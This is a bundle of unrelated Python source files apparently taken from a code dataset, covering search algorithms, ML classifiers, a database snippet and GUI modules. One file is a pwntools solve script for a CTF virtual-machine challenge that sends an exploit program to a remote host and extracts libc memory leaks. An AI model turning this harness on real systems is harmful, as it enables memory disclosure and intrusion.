Ticket Price ---\")\n\t\t\t\tprint(straight_line_distance_from_airport_to_SFO[frontier[index]]) \n\t\t\t\tprint(\"--- ---\")\n\t\t\t\tprint(\"--- Heuristic cost ---\")\n\t\t\t\tprint(heuristic_cost)\n\t\t\t\tprint(\"--- ---\")\n\t\t\t\tif (heuristic_cost < lowest_cost):\n\t\t\t\t\tlowest_index = index\n\t\t\t\t\tlowest_cost = heuristic_cost\n\t\t\t\tindex += 1\n\t\t\tprint(\"--- Lowest index ---\")\n\t\t\tprint(lowest_index)\n\t\t\tprint(\"--- ---\")\n\t\t\tnode = frontier.pop(lowest_index)\n\n\t\t\t# update the current cost\n\t\t\tcurrent_cost += frontier_node_costs[lowest_index]\n\n\t\t\tprint(\"--- Current Cost ---\")\n\t\t\tprint(current_cost)\n\t\t\tprint(\"--- ---\")\n\t\telse:\n\t\t\tnode = frontier.pop()\n\n\t\n\n\t\tif node == goal:\n\t\t\tprint(\"You reached the goal!\")\n\t\t\treturn visited\n\t\t# add that node to the visited nodes queue\n\t\tvisited.append(node)\n\t\tprint(\"--- Visited ---\")\n\t\tprint(visited)\n\t\tprint(\"--- ---\")\n\t\t\n\n\t\t#for each of the node's neighbors n \n\t\tfor neighbor in graph[node]:\n\t\t\tprint(\"--- Neighbor ---\")\n\t\t\tprint(neighbor)\n\t\t\tprint(\"--- ---\")\n\n\t\t\t#if neighbor is goal, then we have reached it\n\t\t\t# we eliminate the case of moving further wehn we are done\n\t\t\tif neighbor[0] == goal:\n\t\t\t\tprint(\"You reached the goal!\")\n\t\t\t\tvisited.append(neighbor[0])\n\t\t\t\treturn visited\n\n\t\t\t# check that it is not in the visited\n\t\t\t# this prevents us from considering a node that we have already visited\n\t\t\tif neighbor[0] not in visited:\n\t\t\t\t# if this is the first iteration, add the node to the frontier\n\t\t\t\tif neighbor[0] not in frontier:\n\t\t\t\t\tfrontier.append(neighbor[0])\n\t\t\t\t\tfrontier_node_costs.append(neighbor[1])\n\t\t\t\t\tcost = neighbor[1]\n\t\t\t\telif cost > neighbor[1]:\n\t\t\t\t\tfrontier.pop()\n\t\t\t\t\tfrontier.append(neighbor[0])\n\t\t\t\t\tfrontier_node_costs.append(neighbor[1])\n\t\t\tprint(\"--- Frontier ---\")\n\t\t\tprint(frontier)\n\t\t\tprint(\"--- ---\") \n\t\t\t# increment counter\n\t\t\t#count = count + 1\n\nprint(A_star_search(graphWithoutDirect, 'JFK', 'SFO'))\n\t","sub_path":"A*-search.py","file_name":"A*-search.py","file_ext":"py","file_size_in_byte":5512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"449345396","text":"\"\"\"pssh utility wrappers.\"\"\"\n\nfrom pssh.exceptions import MissingKeyError\n\nfrom pssh.config import (\n load_configuration_file,\n extract_machine_hierarchy,\n get_user_configuration_path\n)\n\n\ndef list_machines(path_to_file):\n \"\"\"\n List machines.\n\n :param path_to_file Path to file (str?)\n :return Machine names (iterable)\n \"\"\"\n if not path_to_file:\n path_to_file = get_user_configuration_path()\n\n config = load_configuration_file(path_to_file)\n hierarchy = extract_machine_hierarchy(config)\n\n return hierarchy[\"machines\"].keys()\n\n\ndef get_machine_configuration(path_to_file, config_name):\n \"\"\"\n Get machine configuration.\n\n :param path_to_file Path to file (str?)\n :param config_name Config name (str):\n :return Machine configuration (dict)\n \"\"\"\n if not path_to_file:\n path_to_file = get_user_configuration_path()\n\n config = load_configuration_file(path_to_file)\n hierarchy = extract_machine_hierarchy(config)\n\n if config_name not in hierarchy[\"machines\"]:\n raise MissingKeyError(\n \"Missing `{0}` name in machines configuration.\".format(config_name))\n\n return 
hierarchy[\"machines\"][config_name]\n","sub_path":"pssh/wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"402837957","text":"# https://realpython.com/python-keras-text-classification/\nimport pandas as pd\nimport datetime as DT\nimport matplotlib.pyplot as plt\n\n\ntweets_file_location= ''\n#read in tweets\nnegative = pd.read_csv(tweets_file_location+'NEGATIVE_TWEET_FILE_NAME', sep = \";\")\nnegative['target'] = -1\npositive = pd.read_csv(tweets_file_location+'POSITIVE_TWEET_FILE_NAME', sep = \";\")\npositive['target'] = 1\n\nprint(len(positive))\nprint(len(negative))\n\n#Ideally we put these in a file to be read in both be the tweet collection code and the sentiment modelling code to reduce chance of inconsistenties\npositive_emoji = [\":)\", \":-)\", \":D\", \":-D\", \": )\"]\nnegative_emoji = [\":(\", \": (\", \":'(\"]\nall_emoji = positive_emoji+negative_emoji\n\n\ndb = positive.append(negative)\ndb.target.value_counts()\n\nngramrange = (1,3)\n\nimport re, nltk\n\n\nfrom nltk.stem.snowball import DutchStemmer\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import classification_report\n\nnltk.download('punkt')\n\nstemmer = DutchStemmer(ignore_stopwords=False)\n\n\ndef stem_tokens(tokens, stemmer):\n stemmed = []\n for item in tokens:\n stemmed.append(stemmer.stem(item))\n return stemmed\n\n\ndef tokenize(text):\n text = re.sub(\"[^a-zA-Z]\", \" \", text)\n tokens = nltk.word_tokenize(text)\n stems = stem_tokens(tokens, stemmer)\n return stems\n\ntxt = db.text.tolist()\nclean_texts = [tokenize(text) for text in txt]\ndb['clean_text'] = clean_texts\n\ny = db.target.values\n\n\n#END OF DATA PREPROCESSING\n\n\n#BEGINNING OF MODELLING\n\n\nfrom keras.preprocessing.text import Tokenizer\n\nsentences = clean_texts\n\nsentences_train, sentences_test, y_train, y_test = train_test_split(\n sentences, y, test_size=0.25, random_state=1000)\n\ntokenizer = Tokenizer(num_words=5000)\ntokenizer.fit_on_texts(sentences_train)\n\nX_train = tokenizer.texts_to_sequences(sentences_train)\nX_test = tokenizer.texts_to_sequences(sentences_test)\n\nvocab_size = len(tokenizer.word_index) + 1 # Adding 1 because of reserved 0 index\n\n\nfrom keras.preprocessing.sequence import pad_sequences\n\nmaxlen = 50\n\nX_train = pad_sequences(X_train, padding='post', maxlen=maxlen)\nX_test = pad_sequences(X_test, padding='post', maxlen=maxlen)\n\nfrom keras.models import Sequential\nfrom keras import layers\n\nembedding_dim = 150\n\nmodel = Sequential()\nmodel.add(layers.Embedding(input_dim=vocab_size,\n output_dim=embedding_dim,\n input_length=maxlen))\nmodel.add(layers.GlobalMaxPool1D())\nmodel.add(layers.Dense(10, activation='relu'))\nmodel.add(layers.Dense(1, activation='sigmoid'))\nmodel.compile(optimizer='adam',\n loss='binary_crossentropy',\n metrics=['accuracy'])\nmodel.summary()\n\n#todo add tensorboard logging https://fizzylogic.nl/2017/05/08/monitor-progress-of-your-keras-based-neural-network-using-tensorboard/\n\nfrom keras.callbacks import TensorBoard\nfrom time import time\ntensorboard = TensorBoard(log_dir=\"logs/{}\".format(time()))\n\nhistory = model.fit(X_train, y_train,\n epochs=20,\n verbose=1,\n validation_data=(X_test, y_test),\n batch_size=10,\n callbacks=[tensorboard])\nloss, accuracy = model.evaluate(X_train, y_train, verbose=False)\nprint(\"Training Accuracy: 
{:.4f}\".format(accuracy))\nloss, accuracy = model.evaluate(X_test, y_test, verbose=False)\nprint(\"Testing Accuracy: {:.4f}\".format(accuracy))\n\n\ndef plot_history(history):\n acc = history.history['acc']\n val_acc = history.history['val_acc']\n loss = history.history['loss']\n val_loss = history.history['val_loss']\n x = range(1, len(acc) + 1)\n\n plt.figure(figsize=(12, 5))\n plt.subplot(1, 2, 1)\n plt.plot(x, acc, 'b', label='Training acc')\n plt.plot(x, val_acc, 'r', label='Validation acc')\n plt.title('Training and validation accuracy')\n plt.legend()\n plt.subplot(1, 2, 2)\n plt.plot(x, loss, 'b', label='Training loss')\n plt.plot(x, val_loss, 'r', label='Validation loss')\n plt.title('Training and validation loss')\n plt.legend()\n\nplot_history(history)\n","sub_path":"hlmos/src/self trained embedding.py","file_name":"self trained embedding.py","file_ext":"py","file_size_in_byte":4122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"147787227","text":"from sklearn.externals import joblib\nimport re\nimport math\nimport os\nimport time\n\n\nclass SvcClassifition:\n #svm模型加载且预处理数据预测\n def __init__(self,model_path):\n self.model_path = model_path\n self.load_model()\n\n def load_model(self):\n self.clf = joblib.load(self.model_path)\n\n def get_sign(self,content):\n timepattern = re.compile(r'time:(.*?),source')\n sourcepattern = re.compile(r'source:(.*?),lon')\n lonpattern = re.compile(r'lon:(.*?),lat')\n latpattern = re.compile(r'lat:(.*?),thead')\n theadpattern = re.compile(r'thead:(.*?),sog')\n sogpattern = re.compile(r'sog:(.*?),cog')\n cogpattern = re.compile(r'cog:(.*?),status')\n time_date = re.findall(timepattern, content)[0]\n source = int(re.findall(sourcepattern, content)[0])\n lon = float(re.findall(lonpattern, content)[0])\n lat = float(re.findall(latpattern, content)[0])\n thead = float(re.findall(theadpattern, content)[0])\n sog = float(re.findall(sogpattern, content)[0])\n cog = float(re.findall(cogpattern, content)[0])\n return {'time':time_date,'source':source,'lon':lon,'lat':lat,'thead':thead,'sog':sog,'cog':cog}\n\n\n @staticmethod\n def angles(llon, llat, rlon, rlat):\n angle = 0\n dy = rlat - llat\n dx = rlon - llon\n if dx == 0 and dy > 0:\n angle = 0\n if dx == 0 and dy < 0:\n angle = 180\n if dy == 0 and dx > 0:\n angle = 90\n if dy == 0 and dx < 0:\n angle = 270\n if dx > 0 and dy > 0:\n angle = math.atan(dx / dy) * 180 / math.pi\n elif dx < 0 and dy > 0:\n angle = 360 + math.atan(dx / dy) * 180 / math.pi\n elif dx < 0 and dy < 0:\n angle = 180 + math.atan(dx / dy) * 180 / math.pi\n elif dx > 0 and dy < 0:\n angle = 180 + math.atan(dx / dy) * 180 / math.pi\n return angle\n\n @staticmethod\n def get_angle(a1, a2):\n return min(abs(a1 - a2), 360 - abs(a1 - a2))\n\n\n\n def get_feature(self,dic1,dic2,dic3,flag):\n try:\n time1 = self.get_second(dic2['time']) - self.get_second(dic1['time'])\n time2 = self.get_second(dic3['time']) - self.get_second(dic2['time'])\n except:\n time1 = int(dic2['time']) - int(dic1['time'])\n time2 = int(dic3['time']) - int(dic2['time'])\n\n source = 1 if dic1['source'] == dic2['source'] else -1\n lon1 = (dic2['lon'] - dic1['lon']) * 10000\n lat1 = (dic2['lat'] - dic1['lat']) * 10000\n lon2 = (dic3['lon'] - dic2['lon']) * 10000\n lat2 = (dic3['lat'] - dic2['lat']) * 10000\n ang1 = self.angles(dic1['lon'],dic1['lat'],dic2['lon'],dic2['lat'])\n ang2 = self.angles(dic2['lon'],dic2['lat'],dic3['lon'],dic3['lat'])\n thead1 = self.get_angle(dic1['thead'],ang1)\n thead2 = 
self.get_angle(dic2['thead'], ang1)  # angle difference between the target point's heading and the bearing\n        thead3 = self.get_angle(dic2['thead'], ang2)  # angle difference between the target point's heading and the bearing\n        thead4 = self.get_angle(dic3['thead'], ang2)  # angle difference between the next point's heading and the bearing\n        sog1 = dic1['sog']  # SOG of the point before the target point\n        sog2 = dic2['sog']  # SOG of the target point\n        sog3 = dic3['sog']  # SOG of the point after the target point\n        cog1 = dic1['cog']  # COG of the point before the target point\n        cog2 = dic2['cog']  # COG of the target point\n        cog3 = dic3['cog']  # COG of the point after the target point\n        last_is_ture = 1 if flag == 1 else -1\n        # if\n        # [time1, time2, source, lon1, lat1, lon2, lat2, ang1, ang2, thead1, thead2, thead3, thead4, sog1, sog2, sog3, cog1, cog2, cog3, last_is_ture]\n        return [time1,time2,source,lon1,lat1,lon2,lat2,ang1,ang2,thead1,thead2,thead3,thead4,sog1,sog2,sog3,cog1,cog2,cog3,last_is_ture]\n\n    @staticmethod\n    def get_second(string):\n        timeArray = time.strptime(string, \"%Y-%m-%d %H:%M:%S\")\n        timeStamp = int(time.mktime(timeArray))\n        return timeStamp\n\n\n    def predict_string(self,contents):\n        content_list = []\n        pattern = re.compile(r'(mmsi:.*?status:\\d)')\n        index1 = re.findall(pattern, contents)\n        for i in index1:\n            content_list.append(i)\n        res_dic = dict()\n        res_dic['feature'] = list()\n        count = len(content_list)\n        for i in range(count):\n            res_dic['feature'].append(self.get_sign(content_list[i]))\n\n        for i in range(count):\n            if i == 0:\n                res_dic['predict'] = [-1, ]\n            elif i == count-1:\n                res_dic['predict'].append(-1)\n            else:\n                features = self.get_feature(res_dic['feature'][i-1],res_dic['feature'][i],res_dic['feature'][i+1],res_dic['predict'][i-1])\n                print([features])\n                res_dic['predict'].append(int(self.clf.predict([features])))\n        return res_dic\n\n    def predict_list(self,lis):\n        res_dic = dict()\n        res_dic['feature'] = list()\n        count = len(lis)\n        for i in range(count):\n            time_date = int(lis[i][7])\n            source = int(lis[i][1])\n            lon = float(lis[i][4])\n            lat = float(lis[i][3])\n            thead = float(lis[i][8])\n            sog = float(lis[i][6])\n            cog = float(lis[i][2])\n            res_dic['feature'].append({'time': time_date, 'source': source, 'lon': lon, 'lat': lat, 'thead': thead, 'sog': sog, 'cog': cog})\n        for i in range(count):\n            if i == 0:\n                res_dic['predict'] = [-1, ]\n                res_dic['zhixin'] = [1,]\n            elif i == count-1:\n                res_dic['predict'].append(-1)\n                res_dic['zhixin'].append(1)\n            else:\n                features = self.get_feature(res_dic['feature'][i-1],res_dic['feature'][i],res_dic['feature'][i+1],res_dic['predict'][i-1])\n                res_dic['predict'].append(int(self.clf.predict([features])) if res_dic['feature'][i]['sog'] < 5 or features[0] < 7200 else -1)\n                # res_dic['zhixin'].append(self.clf.predict_proba([features]))\n        return res_dic\n\n\nif __name__ == '__main__':\n    model_path = os.path.join(os.getcwd(),\"2.model\")\n    m = SvcClassifition(model_path)\n    a = '''mmsi: 477752100,time:2019-12-09 11:02:00,source: 9046,lon: -43.48028,lat: 3.8937933,thead: 95,sog: 10.4,cog:124.0,status:0\nmmsi: 477752100,time:2019-12-09 13:28:00,source: 300,lon: -43.18454,lat: 3.6898334,thead: 90,sog: 10.0,cog:124.6,status:0\nmmsi: 477752100,time:2019-12-09 14:04:00,source: 300,lon: -43.105392,lat: 3.6324966,thead: 20,sog: 9.8,cog:125.6,status:0\nmmsi: 477752100,time:2019-12-09 14:06:00,source: 300,lon: -43.05704,lat: 3.5951467,thead: 38,sog: 9.7,cog:127.9,status:0'''\n    print(m.predict_string(a)['predict'])\n    print(list(i[0] for i in list(enumerate(m.predict_string(a)['predict'])) if i[1] == 1))\n\n    # [['477752100', '9046', '124.0', '3.8937933', '-43.48028', '-3', '10.4', '1575860520', '129'],\n    # ['477752100', '300', '124.6', '3.6898334', '-43.18454', '7', '10.0', '1575869280', '132'],\n    # ['477752100', '300', '125.6', '3.6324966', '-43.105392', '-1', '9.8', 
'1575871440', '132'],\n # ['477752100', '300', '127.9', '3.5951467', '-43.05704', '-3', '9.7', '1575871560', '132']]\n\n\n","sub_path":"svm_classification/predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":7301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"635676100","text":"import utilityme as utils\n\ndbo = utils.Database(db_host='127.0.0.1', db_usr='root', db_pwd='wave', db_type='mysql')\n\n# =============================================\n# MANAGE db\n# =============================================\n\n# === CREATE\n\n# --- create db\n# dbo.create_db('DB_MOUNTS')\n\n# --- create tb\n# tbname = 'targets'\n# dicts = {'id': 'INT',\n# 'name': 'CHAR',\n# 'shortname': 'CHAR',\n# 'country': 'CHAR',\n# 'lat': 'FLOAT',\n# 'lon': 'FLOAT'}\n# dbo.create_tb(dbname='DB_MOUNTS', tbname=tbname, dicts=dicts, primarykey='id')\n\n\n# === DELETE\n\n# --- delete db\n# dbo.delete_db('DB_MOUNTS')\n\n# --- delete tb\n# NB: works only if table does not have foreign key constraints\n# dbo.delete_tb(dbname='DB_MOUNTS', tbname='targets')\n\n\n# === EMPTY\n\n# --- empty tb\n# NB: works only if table does not have foreign key constraints\n# dbo.empty_tb(dbname='DB_MOUNTS', tbname='targets')\n\n\n# =============================================\n# QUERY db\n# =============================================\n\n# --- convert Records output to Tablib format, and use all of the library's functionalities:\n# dbo = utils.Database(db_host='127.0.0.1', db_usr='root', db_pwd='wave', db_type='mysql')\n# stmt = \"SELECT * FROM DB_MOUNTS.results_img WHERE target_id = '221080'\"\n# rows = dbo.execute_query(stmt)\n# tbl = rows.dataset\n# # tble.append_col([22, 20, 12, 11], header='Age') #= append new column\n\n# --- records lib simplest usage\n# db_url = 'mysql://root:br12Fol!@127.0.0.1/DB_MOUNTS'\n# dbo = records.Database(db_url)\n# stmt = \"SELECT * FROM DB_MOUNTS.archive WHERE target_id = 221080 ORDER BY acqstarttime DESC LIMIT 10\".format(target_id)\n# rows = dbo.query(stmt)\n# for r in rows:\n# print r.title\n# \n# - if only 1 row expected:\n# print rows.first().title\n\n# --- print content\n# dbo.print_dataset(dbname='DB_MOUNTS', tbname='targets') # , colname='prod_title')\n\n# --- get entire table dataset\n# dbo = utils.Database(db_host='127.0.0.1', db_usr='root', db_pwd='wave', db_type='mysql')\n# rows = dbo.get_dataset(dbname='DB_MOUNTS', tbname='targets')\n# for r in rows:\n# print(r.name, r.id)\n#\n# with tablib functionalities:\n# A = rows.dataset\n# A['name']\n#\n# or: rows.dataset['name']\n\n# --- get specific dataset: select elts containing specific string (ex: string '1SSV' at char nb 13)\n# stmt = \"SELECT * FROM DB_MOUNTS.archive WHERE SUBSTRING(title,13,4) = '1SSV'\"\n# rows = dbo.execute_query(stmt)\n# dat = rows.all()\n\n# --- get specific dataset:\n# => AND condition: SELECT * FROM table WHERE column1 = 'var1' AND column2 = 'var2';\n# => OR condition: SELECT * FROM table WHERE column1 = 'var1' OR column2 = 'var2';\n# stmt = \"SELECT * FROM DB_MOUNTS.archive WHERE target_id = '221080' and acqstarttime >= '2016-01-01' and acqstarttime < '2018-01-01' and orbitdirection = 'ASCENDING' and orbitdirection = 'ASCENDING' and polarization = 'VV' ORDER BY acqstarttime ASC\"\n# rows = dbo.execute_query(stmt)\n# for r in rows:\n# print(r.title)\n\n# --- sort based on foreign key\n# EX: get ifg image titles (in 'result_img' table) sorted by acquisition time (in 'archive' table)\ndb_name = 'DB_MOUNTS'\ndbo = utils.Database(db_host='127.0.0.1', 
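The angles() and get_angle() helpers above are pure static methods, so their geometry is easy to sanity-check in isolation (assumes the SvcClassifition class above is importable):

# bearing from (0, 0) to (1, 1): dx = dy = 1, so atan(1) = 45 degrees (north-east)
print(SvcClassifition.angles(0, 0, 1, 1))   # 45.0
# smallest rotation between headings 350 and 10 wraps through north: 20 degrees
print(SvcClassifition.get_angle(350, 10))   # 20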
db_usr='root', db_pwd='wave', db_type='mysql', db_name=db_name)\n\nid = '22180'\nstmt = '''\n SELECT R.title, A.acqstarttime\n FROM results_img AS R\n INNER JOIN archive AS A\n ON R.id_master = A.id\n WHERE R.target_id = {} AND R.type = 'ifg' OR R.type = 'coh'\n ORDER BY A.acqstarttime desc\n '''\nstmt = stmt.format(88)\n\nres = dbo.execute_query(stmt)\nprint(res.dataset)\n\n\n# =============================================\n# DB_MOUNTS\n# =============================================\n\n# === store archive S1 zip files to database\n# volcanoname = 'ertaale'\n# archive_dir = '/home/sebastien/DATA/data_satellite/' + volcanoname\n# dbo.dbmounts_loadarchive(path_dir=archive_dir, print_metadata=1)\n\n# === query targets table\n# --- ex: get target id\n# volcanoname = 'ertaale'\n# stmt = \"SELECT id FROM DB_MOUNTS.targets WHERE shortname = '{}'\".format(volcanoname)\n# rows = dbo.execute_query(stmt)\n# print rows[0][0]\n\n# --- ex: get list of targets\nstmt = \"SELECT shortname FROM DB_MOUNTS.targets\"\nrows = dbo.execute_query(stmt)\nfor r in rows:\n print(r.shortname)\n","sub_path":"build/lib/mounts/snippet_database.py","file_name":"snippet_database.py","file_ext":"py","file_size_in_byte":4215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"359371865","text":"\"\"\" Compiled: 2020-09-18 10:38:49 \"\"\"\n\n#__src_file__ = \"extensions/advanced_corporate_actions/./etc/FCorpActionChoiceGuiCommon.py\"\nimport acm\nimport FBDPGui\nimport importlib\nimportlib.reload(FBDPGui)\nimport FOpenCorpActChoice\nimport FCorpActionPayoutViewer\nimport FBDPCommon\nimport FCustomTextObjectViewer\n\nael_variables = None\n\nADDITIONALINFO_RECORDTYPE = \"CorpActChoice\"\naddInfoNames = FBDPCommon.getAdditionalInfoNames(ADDITIONALINFO_RECORDTYPE)\n\ntt_Name = 'The name of the option'\ntt_CaPayoutsOids = 'list of payouts for the option'\ntt_CorpAction = 'The corporate action of this option'\ntt_Buy = 'Indicates buy as opposed to sell'\ntt_IsDefault = 'Indicate if the choice is the default one'\ntt_Oid = 'The oid of the choice'\n\ndef populateGuiFromChoice(choice, fieldValues):\n for var in ael_variables:\n if var[0] in addInfoNames:\n addinfo = choice.AddInfos()\n for i in addinfo:\n spec = i.AddInf()\n name = spec.FieldName()\n if name == var[0]:\n fieldValues[var.sequenceNumber] = i.FieldValue()\n else:\n if var[0] != 'CaPayoutsOids':\n fieldValues[var.sequenceNumber] = choice.GetProperty(var[0])\n else:\n payouts = ''\n if choice.Oid() > 0:\n for p in choice.CaPayouts():\n payouts += str(p.Oid())\n payouts += ','\n payouts = payouts[:-1]\n fieldValues[var.sequenceNumber] = payouts\n return fieldValues\n\ndef oid_cb(index, fieldValues):\n if isinstance(fieldValues[index], (int, long)):\n choice = acm.FCorporateActionChoice[fieldValues[index]]\n if choice:\n fieldValues = populateGuiFromChoice(choice, fieldValues)\n return fieldValues\n\ndef customDialog(shell, params):\n customDlg = FCorpActionPayoutViewer.PayoutsListCustomDialog(params) \n return acm.UX().Dialogs().ShowCustomDialogModal(shell,\n customDlg.CreateLayout(), customDlg)\n\ndef customTextDlg(shell, params):\n customDlg = FCustomTextObjectViewer.FCustomTextObjectViewer(params)\n return acm.UX().Dialogs().ShowCustomDialogModal(shell,\n customDlg.CreateLayout(), customDlg)\n\nael_variables = FBDPGui.AelVariables(\n ['Name',\n 'Name',\n 'string', None, None,\n None, 1, tt_Name, None, 1],\n ['CaPayoutsOids',\n 'Payouts',\n 'int', None, None,\n 0, 0, tt_CaPayoutsOids, None, 1, customDialog],\n 
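The statements above splice values into the SQL with str.format, which is fine for trusted constants but invites quoting mistakes. With the same mysql.connector driver, the usual pattern is to let the cursor bind parameters; a minimal sketch reusing the snippet's credentials and tables:

import mysql.connector

conn = mysql.connector.connect(host='127.0.0.1', user='root', password='wave', database='DB_MOUNTS')
cur = conn.cursor()
# %s placeholders are bound by the driver rather than interpolated into the SQL text
cur.execute("SELECT title FROM archive WHERE target_id = %s AND polarization = %s",
            (221080, 'VV'))
for (title,) in cur.fetchall():
    print(title)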
['CorpAction',\n 'Corporate Action',\n 'FCorporateAction', None, None,\n 1, 1, tt_CorpAction, None],\n ['IsDefault',\n 'IsDefault',\n 'int', ['1', '0'], 1,\n 1, 0, tt_IsDefault],\n ['Oid',\n 'Oid_hidden',\n 'string', None, None,\n None, None, tt_Oid, oid_cb],\n ['ChoiceRecord',\n 'Option Record_Advanced',\n 'FCustomTextObject', None, None,\n None, 1, None, None, 1, customTextDlg],)\n","sub_path":"Extensions/Advanced Corporate Actions/FPythonCode/FCorpActionChoiceGuiCommon.py","file_name":"FCorpActionChoiceGuiCommon.py","file_ext":"py","file_size_in_byte":3152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"481681168","text":"#!/usr/bin/env dls-python\nfrom adPythonPlugin import AdPythonPlugin\nimport cv2\nimport numpy\nimport logging\n\nclass Focus(AdPythonPlugin):\n def __init__(self):\n # Set a debug logging level in the local logger\n #self.log.setLevel(logging.DEBUG) \n params = dict(ksize = 3, prefilter = 0, iters = 1,\n sum = 0.0, filtered_mean = 0.0, filtered_stddev = 0.0)\n AdPythonPlugin.__init__(self, params)\n \n def paramChanged(self):\n # one of our input parameters has changed\n ksize = self[\"ksize\"]\n self.element = cv2.getStructuringElement(cv2.MORPH_OPEN, (ksize, ksize))\n self.log.info('Changed parameter, ksize=%s', str(ksize))\n\n def processArray(self, arr, attr):\n # got a new image to process\n self.log.debug(\"arr size: %s\", arr.shape)\n self.log.debug(\"parameters: %s\", str(self._params))\n \n if self['prefilter'] > 0:\n dest = cv2.morphologyEx(arr, cv2.MORPH_OPEN, self.element)\n else:\n dest = arr\n dest = cv2.morphologyEx(dest, cv2.MORPH_GRADIENT, \n self.element, iterations = self['iters'])\n #hist = numpy.histogram(dest, bins = self.params['bins'], range = (100,5000))\n #correcthist = (hist[0], hist[1][:-1])\n meanstddev = cv2.meanStdDev(dest)\n self.log.debug(\"mean stddev: %s\", str(meanstddev))\n self['filtered_mean'] = meanstddev[0][0][0]\n self['filtered_stddev'] = meanstddev[1][0][0]\n self['sum'] = cv2.sumElems(dest)[0]\n \n return dest\n\nif __name__==\"__main__\":\n Focus().runOffline()\n","sub_path":"adPythonApp/scripts/adPythonFocus.py","file_name":"adPythonFocus.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"449028119","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom pwn import *\n\nelf = context.binary = ELF('./bin/tvmi', checksec=True)\n# context.terminal = [\"terminator\", \"-u\", \"-e\"]\ncontext.terminal = [\"remotinator\", \"vsplit\", \"-x\"]\n\n\ndef get_conn(argv=[], *a, **kw):\n\thost = args.HOST or '198.11.180.84'\n\tport = int(args.PORT or 6666)\n\tif args.GDB:\n\t\treturn gdb.debug([elf.path] + argv, gdbscript=gdbscript, env=env, *a, **kw)\n\telif args.REMOTE:\n\t\treturn remote(host, port)\n\telse:\n\t\treturn process([elf.path] + argv, env=env, *a, **kw)\n\ngdbscript = '''\nb *tvm_vm_run\nalias sp = p *(vm.mem.registers+6)\ncontinue\n'''\ngdbscript = '\\n'.join(line for line in gdbscript.splitlines() if line and not line.startswith('#'))\nenv = {}\n\nio = get_conn(argv=['./exp.vm'])\nr = lambda x: io.recv(x)\nrl = lambda: io.recvline(keepends=False)\nru = lambda x: io.recvuntil(x, drop=True)\ncl = lambda: io.clean(timeout=1)\ns = lambda x: io.send(x)\nsa = lambda x, y: io.sendafter(x, y)\nsl = lambda x: io.sendline(x)\nsla = lambda x, y: io.sendlineafter(x, y)\nia = lambda: io.interactive()\nli = lambda s: log.info(s)\nls = lambda s: log.success(s)\n\n\nif 
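The focus plugin above scores sharpness from the morphological gradient (as edges sharpen, the gradient's mean and spread rise). A standalone sketch of that measure outside the areaDetector framework; note that getStructuringElement expects a shape constant (cv2.MORPH_RECT, cv2.MORPH_ELLIPSE, ...) and the cv2.MORPH_OPEN passed above happens to share the numeric value of cv2.MORPH_ELLIPSE:

import cv2
import numpy as np

frame = np.random.randint(0, 256, (64, 64), dtype=np.uint8)  # stand-in grayscale frame
element = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3, 3))
grad = cv2.morphologyEx(frame, cv2.MORPH_GRADIENT, element)
mean, stddev = cv2.meanStdDev(grad)
print('focus score: mean=%.2f stddev=%.2f' % (mean[0][0], stddev[0][0]))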
args.REMOTE:\n\texp = open(\"./exp.vm\").read()\n\tsla(b'(< 4096) :', str(len(exp)).encode())\n\ts(exp.encode())\n\ndef tohex(val, nbits=32):\n return hex((val + (1 << nbits)) % (1 << nbits))[2:].rjust(8, '0')\n\ndef de(v):\n\treturn unhex(tohex(int(v.decode())))\n\ndef leak_libc_binary():\n\tints = io.recvall(timeout=60).decode().splitlines()\n\tints = list(map(int, ints))\n\tints = list(map(tohex, ints))\n\tints = list(map(unhex, ints))\n\traw_bytes = list(map(lambda h: h[::-1], ints))\n\traw_bytes = b''.join(raw_bytes)\n\n\twith open(\"./libc.so\", \"wb\") as f:\n\t\tf.write(raw_bytes)\n\n# leak_libc_binary()\n\n\ndef leak8():\n\tlo = de(rl())\n\thi = de(rl())\n\tlibc_leak = u64((hi+lo)[::-1])\n\tls(f\"{libc_leak:#x}\")\n\n# leak8()\n\n\nia()\n\n","sub_path":"realworld_ctf_2022/tinyvm/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"25229425","text":"import csv\nimport math\n\nimpact_dict = \"./dictionaries/TrueDict.csv\"\nnonimpact_dict = \"./dictionaries/FalseDict.csv\"\nimpact_word_count = 1995\nnonimpact_word_count = 2215\ntweets = \"./tweets/final100tweets.csv\"\nres = open(\"./nb_results.txt\", \"w+\")\n\nwith open(tweets) as tweets_csv:\n tweets_reader = csv.reader(tweets_csv, delimiter=',')\n\n for t in tweets_reader:\n impact_value = 0\n nonimpact_value = 0\n impacted = False\n\n for word in t:\n if word != '' and len(word) > 3:\n with open(impact_dict) as impact_csv:\n impact_reader = csv.reader(impact_csv, delimiter=\",\")\n\n impact_value += float(math.log(1/impact_word_count))\n\n for imp_line in impact_reader:\n if imp_line[0] == word:\n impact_value += float(imp_line[1]) - float(math.log(1/impact_word_count))\n break\n #end of for\n \n with open(nonimpact_dict) as nonimpact_csv:\n nonimpact_reader = csv.reader(nonimpact_csv, delimiter=\",\")\n\n nonimpact_value += float(math.log(1/nonimpact_word_count))\n\n for nonimp_line in nonimpact_reader:\n if nonimp_line[0] == word:\n nonimpact_value += float(nonimp_line[1]) - float(math.log(1/nonimpact_word_count))\n break\n #end of for\n #end of for\n\n if impact_value > nonimpact_value:\n impacted = True\n else:\n impacted = False\n \n res.write(t[0] + \": \" + str(impacted) + \" -- \" + str(impact_value) + \" \" + str(nonimpact_value) + 